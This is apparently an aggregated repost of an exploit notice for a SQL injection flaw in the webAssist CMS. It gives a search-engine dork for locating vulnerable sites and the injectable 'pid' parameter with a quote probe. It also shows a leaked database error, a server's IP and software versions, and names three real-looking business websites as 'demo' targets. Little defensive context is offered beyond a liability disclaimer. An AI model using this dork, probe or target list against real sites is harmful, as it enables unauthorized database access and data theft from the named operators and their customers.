Quantcast
Channel: BOT24
Viewing all articles
Browse latest Browse all 8064

webAssist Sqli Vulnerability

$
0
0

[+] webAssist Sql Injection Vulnerability
[-] Found by Angel Injection
[-] Version: N/A
[-] Security -::RISK: middel
[-] platforms: php
[-] Dork: intext:"Powered By webAssist" inurl:index.php?pid=
[-] Link: https:///www.webassist.ca/

أهداء لاصدقائي في العراق

http://target/index.php?pid=8' sql here
Database error: Invalid SQL: SELECT * FROM cms_master WHERE page_id IN ('8'')
Host IP: 69.41.197.197
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.1.6
Powered-by: PleskLin
Keyword Found: Bringing
Injection type is Integer
Keyword corrected: 3:00.&nbps;&nbps;Clinics
DB Server: MySQL

demo
http://www.aaenvironmental.ca/index.php?pid=8%27
http://www.londonvetsurgeon.ca/index.php?pid=8%27
http://www.knollcrestlodge.com/index.php?pid=8%27




//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information


Viewing all articles
Browse latest Browse all 8064

Trending Articles